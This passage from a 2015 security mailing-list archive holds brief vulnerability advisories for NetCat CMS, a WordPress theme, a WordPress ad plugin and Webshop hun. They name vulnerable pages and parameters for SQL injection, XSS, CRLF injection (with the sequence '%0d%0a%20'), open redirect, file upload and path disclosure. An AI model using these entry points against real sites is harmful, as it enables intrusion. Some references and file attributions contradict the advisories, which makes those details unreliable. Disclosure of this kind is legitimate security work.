by Unvalidated Redirects and Forwards (URL Redirection) attacks. This could
allow a user to create a specially crafted URL, that if clicked, would
redirect a victim from the intended legitimate web site to an arbitrary web
site of the attacker's choosing. Such attacks are useful as the crafted URL
initially appear to be a web page of a trusted site. This could be
leveraged to direct an unsuspecting user to a web page containing attacks
that target client side software such as a web browser or document
rendering programs.

Other Innovative Interfaces products vulnerabilities have been found by
some other bug hunter researchers before. Innovative has patched some of
them. NVD is the U.S. government repository of standards based
vulnerability management data (This data enables automation of
vulnerability management, security measurement, and compliance (e.g.
FISMA)). It has published suggestions, advisories, solutions related to
Innovative vulnerabilities.

*(2.1) *The first code programming flaw occurs at "showres?" page with
"&url" parameter.







*References:*
http://tetraph.com/security/open-redirect/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/innovative-webpac-pro-20-unvalidated.html
http://www.inzeed.com/kaleidoscope/computer-web-security/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/
https://infoswift.wordpress.com/2015/03/14/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/
http://marc.info/?l=full-disclosure&m=142527148510581&w=4
http://en.hackdig.com/wap/?id=17054






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] WordPress Daily Edition Theme v1.6.2 Information Leakage Security Vulnerabilities

[Jing Wang]

*WordPress Daily Edition Theme v1.6.2 Information Leakage Security
Vulnerabilities*


Exploit Title: WordPress Daily Edition Theme /thumb.php src Parameters
Information Leakage Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.*   v1.5.*   v1.4.*   v1.3.*   v1.2.*   v1.1.*
v.1.0.*
Tested Version: v1.6.2
Advisory Publication: March 10, 2015
Latest Update: March 10, 2015
Vulnerability Type: Information Exposure [CWE-200]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
WooThemes



*Product & Vulnerable Versions:*
WordPress Daily Edition Theme
version 1.6.7
version 1.6.6
version 1.6.5
version 1.6.4
version 1.6.3
version 1.6.2
version 1.6.1
version 1.6
version 1.5
version 1.4.11
version 1.4.10
version 1.4.9
version 1.4.8
version 1.4.7
version 1.4.6
version 1.4.5
version 1.4.4
version 1.4.3
version 1.4.2
version 1.4.1
version 1.4.0
version 1.3.2
version 1.3.1
version 1.3
version 1.2.1
version 1.2
version 1.1.2
version 1.1.1
version 1.1
version 1.0.12
version 1.0.11
version 1.0.10
version 1.0.9
version 1.0.8
version 1.0.7
version 1.0.6
version 1.0.5
version 1.0.4
version 1.0.3
version 1.0.2
version 1.0.1
version 1.0



*Vendor URL & buy:*
WordPress Daily Edition Theme can be got from here,
http://www.woothemes.com/products/daily-edition/
http://dzv365zjfbd8v.cloudfront.net/changelogs/dailyedition/changelog.txt



*Product Introduction:*
"Daily Edition WordPress Theme developed by wootheme team and Daily Edition
is a clean, spacious newspaper/magazine theme designed by Liam McKay. With
loads of home page modules to enable/disable and a unique java script-based
featured scroller and video player the theme oozes sophistication"

"The Daily Edition theme offers users many options, controlled from the
widgets area and the theme options page – it makes both the themes
appearance and functions flexible. From The Daily Edition 3 option pages
you can for example add your Twitter and Google analytics code, some custom
CSS and footer content – and in the widgets area you find a practical ads
management."

"Unique Features
These are some of the more unique features that you will find within the
theme:
A neat javascript home page featured slider, with thumbnail previews of
previous/next slides on hover over the dots.
A “talking points” home page that can display posts according to tags,
in order of most commented to least commented. A great way to highlight
posts gathering dust in the archives.
A customizable home page layout with options to specify how many full
width blog posts and how many “box” posts you would like to display.
A javascript home page video player with thumbnail hover effect.
16 delicious colour schemes to choose from!"







*(2) Vulnerability Details:*
WordPress Daily Edition Theme has a web application security bug problem.
It can be exploited by information leakage attacks - Full Path Disclosure
(FPD). This may allow a remote attacker to disclose the software's
installation path. While such information is relatively low risk, it is
often useful in carrying out additional, more focused attacks.


*(2.1) *The code flaw occurs at "thumb.php?" page with "src" parameters.







*References:*
http://tetraph.com/security/information-leakage-vulnerability/wordpress-daily-edition-theme-v1-6-2-information-leakage-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162_10.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-information-leakage-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-information-leakage-security-vulnerabilities/
https://webtechwire.wordpress.com/2015/03/10/wordpress-daily-edition-theme-v1-6-2-information-leakage-security-vulnerabilities/
http://static-173-79-223-25.washdc.fios.verizon.net/?a=139222176300014&r=1&w=2
https://cxsecurity.com/issue/WLB-2015020093






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Webshop hun v1.062S Information Leakage (Full Path Disclosure - FPD) Security Vulnerabilities

[Jing Wang]

*Webshop hun v1.062S Information Leakage (Full Path Disclosure - FPD)
Security Vulnerabilities*


Exploit Title: Webshop hun v1.062S /index.php termid parameter Information
Leakage Security Vulnerabilities
Product: Webshop hun
Vendor: Webshop hun
Vulnerable Versions: v1.062S
Tested Version: v1.062S
Advisory Publication: March 07, 2015
Latest Update: March 07, 2015
Vulnerability Type: Information Exposure [CWE-200]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
Webshop hun


*Product & Version:*
Webshop hun
v1.062S


*Vendor URL & Download:*
Webshop hun can be bought from here,
http://www.webshophun.hu/index


*Product Introduction:*
Webshop hun is an online product sell web application system.

"If our webshop you want to distribute your products, but it is too
expensive to find on the internet found solutions, select the Webshop Hun
shop program and get web store for free and total maker banner must display
at the bottom of the page 468x60 size. The download shop program, there is
no product piece limit nor any quantitative restrictions, can be used
immediately after installation video which we provide assistance.

"The Hun Shop store for a free for all. In our experience, the most dynamic
web solutions ranging from our country. If the Webshop Hun own image does
not suit you, you can also customize the look of some of the images and the
corresponding text replacement, or an extra charge we can realize your
ideas. The Webshop Hun pages search engine optimized. They made the Hun
Shop web program to meet efficiency guidelines for the search engines. The
pages are easy to read and contain no unnecessary HTML tags. Any web page
is simply a few clicks away."





*(2) Vulnerability Details:*
Webshop hun web application has a security bug problem. It can be exploited
by Information Leakage attacks. This may allow a remote attacker to
disclose the software's installation path. While such information is
relatively low risk, it is often useful in carrying out additional, more
focused attacks.



*(2.1)* The code flaw occurs at "index.php?" page with "termid" parameter.
Attackers can get information such the server software installation path,
etc.






*References:*
http://tetraph.com/security/information-leakage-vulnerability/webshop-hun-v1-062s-information-leakage-full-path-disclosure-fpd-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/webshop-hun-v1062s-information-leakage.html
http://www.inzeed.com/kaleidoscope/computer-web-security/webshop-hun-v1-062s-information-leakage-full-path-disclosure-fpd-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/webshop-hun-v1-062s-information-leakage-full-path-disclosure-fpd-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/webshop-hun-v1-062s-information-leakage-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/26
http://packetstormsecurity.com/files/130648/Webshop-Hun-1.062S-Cross-Site-Scripting.html







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] NetCat CMS Multiple HTTP Response Splitting (CRLF) Security Vulnerabilities

[Jing Wang]

*NetCat CMS Multiple HTTP Response Splitting (CRLF) Security
Vulnerabilities*


Exploit Title: NetCat CMS Multiple CRLF Security Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 5.01   3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 3.12
Advisory Publication: Mar 07, 2015
Latest Update: Mar 07, 2015
Vulnerability Type: Improper Neutralization of CRLF Sequences ('CRLF
Injection') [CWE-93]
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
NetCat


*Product & Version:*
NetCat
5.01   3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL & Download:*
NetCat can be got from here,
http://netcat.ru/


*Product Introduction:*
NetCat.ru is russian local company. "NetCat designed to create an absolute
majority of the types of sites: from simple "business card" with a minimum
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects completely
different directions and at any level of complexity. View examples of sites
running on NetCat CMS can be in a special section."

"Manage the site on the basis of NetCat can even inexperienced user,
because it does not require knowledge of Internet technologies, programming
and markup languages. NetCat constantly improving, adds new features. In
the process of finalizing necessarily take into account the wishes of our
partners and clients, as well as trends in Internet development. More than
2,000 studios and private web developers have chosen for their projects is
NetCat, and in 2013 sites, successfully working on our CMS, created more
than 18,000."





*(2) Vulnerability Details:*
NetCat web application has a security bug problem. It can be exploited by
HTTP Response Splitting (CRLF) attacks. This could allow a remote attacker
to insert arbitrary HTTP headers, which are included in a response sent to
the server. If an application does not properly filter such a request, it
could be used to inject additional headers that manipulate cookies,
authentication status, or more.

*(2.1)* The first code flaw occurs at "/post.php" page with "redirect_url"
parameter by adding "%0d%0a%20".

*(2.2)* The second code flaw occurs at "redirect.php?" page with "url"
parameter by adding "%0d%0a%20".








*References:*
http://securityrelated.blogspot.com/2015/03/netcat-cms-multiple-http-response.html
http://tetraph.com/security/http-response-splitting-vulnerability/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/
http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/8
http://packetstormsecurity.com/files/130584/NetCat-CMS-5.01-Open-Redirect.html








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] WordPress Daily Edition Theme v1.6.2 Unrestricted Upload of File Security Vulnerabilities

[Jing Wang]

*WordPress Daily Edition Theme v1.6.2 Unrestricted Upload of File Security
Vulnerabilities*


Exploit Title: WordPress Daily Edition Theme v1.6.2 /thumb.php src
Parameter Unrestricted Upload of File Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.2
Tested Version: v1.6.2
Advisory Publication: Mar 07, 2015
Latest Update: Mar 07, 2015
Vulnerability Type: Unrestricted Upload of File with Dangerous Type
[CWE-434]
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
WooThemes



*Product & Version:*
WordPress Daily Edition Theme
v1.6.2



*Vendor URL & Download:*
WordPress Daily Edition Theme can be got from here,
http://www.woothemes.com/products/daily-edition/



*Product Introduction:*
"Daily Edition WordPress Theme developed by wootheme team and Daily Edition
is a clean, spacious newspaper/magazine theme designed by Liam McKay. With
loads of home page modules to enable/disable and a unique java script-based
featured scroller and video player the theme oozes sophistication"

"The Daily Edition theme offers users many options, controlled from the
widgets area and the theme options page – it makes both the themes
appearance and functions flexible. From The Daily Edition 3 option pages
you can for example add your Twitter and Google analytics code, some custom
CSS and footer content – and in the widgets area you find a practical ads
management."

"Unique Features
These are some of the more unique features that you will find within the
theme:
A neat javascript home page featured slider, with thumbnail previews of
previous/next slides on hover over the dots.
A “talking points” home page that can display posts according to tags,
in order of most commented to least commented. A great way to highlight
posts gathering dust in the archives.
A customizable home page layout with options to specify how many full
width blog posts and how many “box” posts you would like to display.
A javascript home page video player with thumbnail hover effect.
16 delicious colour schemes to choose from!"







*(2) Vulnerability Details:*
WordPress Daily Edition Theme web application has a security bug problem.
It can be exploited by "Unrestricted Upload of File" (Arbitrary File
Uploading) attacks. With a specially crafted request, a remote attacker can
include arbitrary files from the targeted host or from a remote or local
host . This may allow disclosing file contents or executing files like PHP
scripts. Such attacks are limited due to the script only calling files
already on the target host.


*(2.1)* The code flaw occurs at "thumb.php?" page with "src" parameters.








*References:*
http://tetraph.com/security/unrestricted-upload-of-file-arbitrary/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/4
http://packetstormsecurity.com/files/130653/Webshop-Hun-1.062S-Directory-Traversal.html







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] WordPress Daily Edition Theme v1.6.2 SQL Injection Security Vulnerabilities

[Jing Wang]

*WordPress Daily Edition Theme v1.6.2 SQL Injection Security
Vulnerabilities*


Exploit Title: WordPress Daily Edition Theme v1.6.2 /fiche-disque.php id
Parameters SQL Injection Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.2
Tested Version: v1.6.2
Advisory Publication: Mar 07, 2015
Latest Update: Mar 07, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*



*Vendor:*
WooThemes



*Product & Version:*
WordPress Daily Edition Theme
v1.6.2



*Vendor URL & Download:*
WordPress Daily Edition Theme can be got from here,
http://www.woothemes.com/products/daily-edition/



*Product Introduction:*
"Daily Edition WordPress Theme developed by wootheme team and Daily Edition
is a clean, spacious newspaper/magazine theme designed by Liam McKay. With
loads of home page modules to enable/disable and a unique java script-based
featured scroller and video player the theme oozes sophistication"

"The Daily Edition theme offers users many options, controlled from the
widgets area and the theme options page – it makes both the themes
appearance and functions flexible. From The Daily Edition 3 option pages
you can for example add your Twitter and Google analytics code, some custom
CSS and footer content – and in the widgets area you find a practical ads
management."

"Unique Features
These are some of the more unique features that you will find within the
theme:
A neat javascript home page featured slider, with thumbnail previews of
previous/next slides on hover over the dots.
A “talking points” home page that can display posts according to tags,
in order of most commented to least commented. A great way to highlight
posts gathering dust in the archives.
A customizable home page layout with options to specify how many full
width blog posts and how many “box” posts you would like to display.
A javascript home page video player with thumbnail hover effect.
16 delicious colour schemes to choose from!"







*(2) Vulnerability Details:*
WordPress Daily Edition Theme web application has a  security bug problem.
It can be exploited by SQL Injection attacks. This may allow a remote
attacker to inject or manipulate SQL queries in the back-end database,
allowing for the manipulation or disclosure of arbitrary data.


*(2.1)* The code flaw occurs at "fiche-disque.php?" page with "&id"
parameter.








*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162-sql.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/27
http://packetstormsecurity.com/files/130075/SmartCMS-2-SQL-Injection.html






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Webshop hun v1.062S XSS (Cross-site Scripting) Security Vulnerabilities

[Jing Wang]

*Webshop hun v1.062S XSS (Cross-site Scripting) Security Vulnerabilities*


Exploit Title: Webshop hun v1.062S /index.php Multiple Parameters XSS
Security Vulnerabilities
Product: Webshop hun
Vendor: Webshop hun
Vulnerable Versions: v1.062S
Tested Version: v1.062S
Advisory Publication: Mar 04, 2015
Latest Update: Mar 04, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
Webshop hun


*Product & Version:*
Webshop hun
v1.062S


*Vendor URL & Download:*
Webshop hun can be downloaded from here,
http://www.webshophun.hu/index


*Product Introduction:*
Webshop hun is an online product sell web application system.

"If our webshop you want to distribute your products, but it is too
expensive to find on the internet found solutions, select the Webshop Hun
shop program and get web store for free and total maker banner must display
at the bottom of the page 468x60 size. The download shop program, there is
no product piece limit nor any quantitative restrictions, can be used
immediately after installation video which we provide assistance.

"The Hun Shop store for a free for all. In our experience, the most dynamic
web solutions ranging from our country. If the Webshop Hun own image does
not suit you, you can also customize the look of some of the images and the
corresponding text replacement, or an extra charge we can realize your
ideas. The Webshop Hun pages search engine optimized. They made the Hun
Shop web program to meet efficiency guidelines for the search engines. The
pages are easy to read and contain no unnecessary HTML tags. Any web page
is simply a few clicks away."





*(2) Vulnerability Details:*
Webshop hun has a web application security bug problem. It can be exploited
by XSS (Cross-site Scripting) attacks.


*(2.1) *The vulnerability occurs at "index.php?" page with "param" "center"
"lap" "termid" "nyelv_id" parameters.






*References:*
http://tetraph.com/security/xss-vulnerability/webshop-hun-v1-062s-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/webshop-hun-v1062s-xss-cross-site.html
http://www.inzeed.com/kaleidoscope/computer-web-security/webshop-hun-v1-062s-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/webshop-hun-v1-062s-xss-cross-site-scripting-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/03/04/webshop-hun-v1-062s-xss-cross-site-scripting-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=2





--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] WordPress "Max Banner Ads" Plug-in XSS (Cross-site Scripting) Security Vulnerabilities

[Jing Wang]

*WordPress "Max Banner Ads" Plug-in XSS (Cross-site Scripting) Security
Vulnerabilities*


Exploit Title: Wordpress "Max Banner Ads" Plugin /info.php &zone_id
Parameter XSS Security Vulnerabilities
Product: Wordpress "Max Banner Ads" Plugin
Vendor: MaxBlogPress
Vulnerable Versions: 1.9  1.8   1.4   1.3.*   1.2.*   1.1   1.09
Tested Version: Check All Related Versions' Source Code
Advisory Publication: Mar 04, 2015
Latest Update: Mar 04, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
MaxBlogPress


*Product & Version:*
Wordpress "Max Banner Ads" Plugin
1.9   1.8   1.4   1.3.7   1.3.6   1.3.5   1.3.4   1.3.3   1.3.2   1.3.1
1.3
1.2.7   1.2.6   1.2.5   1.2   1.1   1.09



*Vendor URL & Download:*
Wordpress "Max Banner Ads" Plugin can be downloaded from here,
http://www.maxblogpress.com/plugins/


*Product Introduction:*
"Easily add and rotate banners in your wordpress blog anywhere you like
without editing any themes or touching any codes"





*(2) Vulnerability Details:*
Wordpress "Max Banner Ads" Plugin has a web application security bug
problem. It can be exploited by XSS (Cross-site Scripting) attacks.


*(2.1) *The vulnerability occurs at "info.php?" page with "zone_id"
parameter.







*References:*
http://tetraph.com/security/xss-vulnerability/wordpress-max-banner-ads-plug-in-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-max-banner-ads-plug-in-xss.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-max-banner-ads-plug-in-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-max-banner-ads-plug-in-xss-cross-site-scripting-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/03/04/wordpress-max-banner-ads-plug-in-xss-cross-site-scripting-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=2







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] NetCat CMS Multiple URL Redirection (Open Redirect) Security Vulnerabilities

[Jing Wang]

*NetCat CMS Multiple URL Redirection (Open Redirect) Security
Vulnerabilities*



Exploit Title: NetCat CMS Multiple URL Redirection Security Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 5.01   3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 3.12
Advisory Publication: Feb 25, 2015
Latest Update: Feb 25, 2015
Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect')
[CWE-601]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
NetCat


*Product & Version:*
NetCat
5.01   3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL & Download:*
NetCat can be downloaded from here,
http://netcat.ru/


*Product Introduction:*
NetCat.ru is russian local company. "NetCat designed to create an absolute
majority of the types of sites: from simple "business card" with a minimum
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects completely
different directions and at any level of complexity. View examples of sites
running on NetCat CMS can be in a special section."

"Manage the site on the basis of NetCat can even inexperienced user,
because it does not require knowledge of Internet technologies, programming
and markup languages. NetCat constantly improving, adds new features. In
the process of finalizing necessarily take into account the wishes of our
partners and clients, as well as trends in Internet development. More than
2,000 studios and private web developers have chosen for their projects is
NetCat, and in 2013 sites, successfully working on our CMS, created more
than 18,000."





*(2) Vulnerability Details:*
NetCat has a security bug problem. It can be exploited by URL Redirection
(Open Redirect) attacks.

*(2.1)* The first vulnerability occurs at "modules/redir/?" page with
"site" parameter.

*(2.2)* The second vulnerability occurs at "redirect.php?" page with "url"
parameter.

*(2.3)* The third vulnerability occurs at "netshop/post.php" page with
"redirect_url" parameter







*References:*
http://tetraph.com/security/open-redirect/netcat-cms-multiple-url-redirection-open-redirect-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/netcat-cms-multiple-url-redirection.html
http://www.inzeed.com/kaleidoscope/computer-security/netcat-cms-multiple-url-redirection-open-redirect-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-multiple-url-redirection-open-redirect-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/netcat-cms-multiple-url-redirection-open-redirect-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=2






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] NetCat CMS Full Path Disclosure (Information Disclosure) Security Vulnerabilities

[Jing Wang]

*NetCat CMS Full Path Disclosure (Information Disclosure) Security
Vulnerabilities*



Exploit Title: NetCat CMS Full Path Disclosure Security Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 5.01   3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 5.01   3.12
Advisory Publication: Feb 25, 2015
Latest Update: Feb 25, 2015
Vulnerability Type: Information Leak / Disclosure [CWE-200]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
NetCat


*Product & Version:*
NetCat
5.01   3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL & Download:*
NetCat can be downloaded from here,
http://netcat.ru/


*Product Introduction:*
NetCat.ru is russian local company. "NetCat designed to create an absolute
majority of the types of sites: from simple "business card" with a minimum
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects completely
different directions and at any level of complexity. View examples of sites
running on NetCat CMS can be in a special section."

"Manage the site on the basis of NetCat can even inexperienced user,
because it does not require knowledge of Internet technologies, programming
and markup languages. NetCat constantly improving, adds new features. In
the process of finalizing necessarily take into account the wishes of our
partners and clients, as well as trends in Internet development. More than
2,000 studios and private web developers have chosen for their projects is
NetCat, and in 2013 sites, successfully working on our CMS, created more
than 18,000."





*(2) Vulnerability Details:*
NetCat has a security bug problem. It can be exploited by Full Path
Disclosure (Information Disclosure) attacks.

*(2.1)* The first vulnerability occurs at "netshop/post.php" page with
"redirect_url" parameter.







*References:*
http://tetraph.com/security/full-path-disclosure-vulnerability/netcat-cms-full-path-disclosure-information-disclosure-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/netcat-cms-full-path-disclosure.html
http://www.inzeed.com/kaleidoscope/computer-security/netcat-cms-full-path-disclosure-information-disclosure-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-full-path-disclosure-information-disclosure-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/netcat-cms-full-path-disclosure-information-disclosure-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=2






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] NetCat CMS Multiple Remote File Inclusion (RFI) Security Vulnerabilities

[Jing Wang]

*NetCat CMS Multiple Remote File Inclusion (RFI) Security Vulnerabilities*


Exploit Title: NetCat CMS Multiple Remote File Inclusion (RFI) Security
Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 3.12
Advisory Publication: Feb 25, 2015
